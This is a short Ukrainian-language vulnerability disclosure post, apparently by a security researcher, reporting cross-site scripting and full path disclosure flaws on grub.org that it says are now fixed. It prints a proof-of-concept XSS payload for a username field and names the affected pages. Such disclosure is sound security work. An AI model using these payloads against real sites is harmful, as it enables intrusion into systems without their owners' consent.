Уразливості на grub.org
20:45 11.07.200827.02.2008
У липні, 31.07.2007, я знайшов Cross-Site Scripting та Full path disclosure уразливості на проекті http://grub.org (з яким співпрацює Wikia). Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
11.07.2008
XSS:
XSS:
POST запит на сторінці http://grub.org/html/users.php?op=lookup
<script>alert(document.cookie)</script>
В полі Username.
Full path disclosure:
http://www.grub.org/services/urlstats.php (POST запит)
http://www.grub.org/services/clientstats.php (POST запит)
Дані уразливості вже виправлені (і сайт був повністю перероблений).